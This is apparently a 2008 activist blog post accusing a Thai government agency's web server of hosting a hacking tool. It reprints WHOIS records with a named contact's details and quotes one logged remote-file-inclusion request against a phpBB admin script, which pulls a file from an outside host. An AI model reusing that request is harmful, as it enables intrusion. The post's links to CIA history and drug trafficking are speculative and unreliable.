Homeland Security in Bangkok Launches Cyberwar Against Dissidents
David Roknich | 11.05.2008 16:03 | Climate Chaos | Repression | Technology | World
The evidence is here:
http://www.cdpm3.com/id.txt
Cyber-attacks from Thai Homeland Security (www.cdpm3.com)
The Thai equivalent of our DHS didn't exist until 2004, and got a tremendous boost on January 1, 2007.
Their domain registration helps document their history:
Domain Name: CDPM3.COM
Registrar: TUCOWS INC.
Whois Server: whois.tucows.com
Referral URL: http://domainhelp.opensrs.net
Name Server: MYNA.CAT.NET.TH
Name Server: TEAL.CAT.NET.TH
Status: ok
Updated Date: 11-dec-2007
Creation Date: 08-dec-2004
Expiration Date: 08-dec-2008
I wasn't able to connect the dots until today when I witnessed a series of attacks against a server which hosts stories of genocide in Myanmar, and amphetamine distribution in Thailand produced under the direct protection of the military junta. Our own DEA has documented this drug trade (in addition to vast opium exports), and I have also found some translations of first hand accounts from Thailand.
The "Friendship Bridge" is important for a number of reasons. It is a conduit for illicit cargo. Some of the cargo is human. These are the victims of an oligarchy that has manipulated both nations for the past decade, an oligarchy that will use the disaster today to accomplish a goal they have long sought. And the oligarchy has fought on every front, including the frontiers of cyberspace.
Spam, phishing, and cyber-attacks of every type seem to be the full time occupation of most servers with asian addresses - but it is at least odd to find "hacking tools" on the server of a nation's Homeland Security Department. And here are some more details from Bangkok:
Registrant:
Department of Disaster Prevention and Mitigation
3/12 Utongnok Road
Dusit, Bangkok 10300
TH
Domain name: CDPM3.COM
Administrative Contact:
Phopapapan, Supakit
psupskit@yahoo.com
3/12 Utongnok Road
Dusit, Bangkok 10300
TH
+662-241-4403
Fax: +662-241-4403
Registration Service Provider:
Netway Communication Co., Ltd.,
domreg@siamdomain.com
66-2-639-7700
http://www.siamdomain.com
Registrar of Record: TUCOWS, INC.
Record last updated on 11-Dec-2007.
Record expires on 08-Dec-2008.
Record created on 08-Dec-2004.
Domain servers in listed order:
MYNA.CAT.NET.TH
TEAL.CAT.NET.TH
DNS RECORDS:
cdpm3.com IN SOA myna.cat.net.th
cdpm3.com IN NS myna.cat.net.th
cdpm3.com IN A 61.19.100.10
10.100.19.61.in-addr.arpa IN PTR www.cdpm1.com
The incriminating URL, where evidence exists right now:
http://www.cdpm3.com/id.txt
You won't want to enter it with a "?" at the end, or the command in the text file may be launched. That's how it is used by hackers at remote locations, such as the folks at IP 69.64.33.211
And here is an example that I witnessed in real time, and blocked via htaccess:
/dogspot//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= http://www.cdpm3.com/id.txt?
Date: May 10 08:20:20 (Eastern Standard Time)
Agent: libwww-perl/5.805
The hackers have named their server:
air176.startdedicated.com.
1976 was the last year that Air America would fly, thanks to the investigations led by Frank Church.
Wikipedia has some good background for the current intrigue. Please read:
Air America was an American passenger and cargo airline covertly owned and operated by the Central Intelligence Agency (CIA) from 1950 to 1976. It supplied and supported covert operations in Southeast Asia during the Second Indochina War. Air America
2 important figures are Vang Pao and Eli Popovich. The role Popovich played has been kept secret until recently. The accounts by Alfred W. McCoy are authoritative. The "historian" Leary, of the Univerisity of Georgia, remained in the pocket of the CIA, and thus was spared the threats to his life that McCoy endured.
You won't easily find out who is really operating the server on North Tucker Road in St. Louis, MO where the subdomain
air176.startdedicated.com.
is hosted.Try the abuse contact at
http://server4you.net
if you want to waste your time. It is a subdomain delegated from 85.25.10.39, hosted in Germany by "PlusServer" at intergenia.de
historical background:
Role of Burma (Myanmar) and Thailand in the economy of South Asia
keywords and notes:
"Alfred McCoy" opium, burma, namebase, "golden triangle", warlords, afghanistan, WA Amphetamine empire, engagement with unocal
When I originally published "New Years Bombing in Bangkok" from wire stories and tourist reports on New Year 2007, I couldn't figure out why it was so popular. Now I am beginning to understand.
The great game continues in Myanmar (world's top opium producer in 1999), but I have not yet had breakfast. Enter the keywords above into google, and you'll have the background for my story.
Links and updates may be found at:
http://electromagnet.us/dogspot/modules.php?name=News&file=article&sid=576
David Roknich,
DOGSPOT
David Roknich
Homepage:
http://electromagnet.us/dogspot/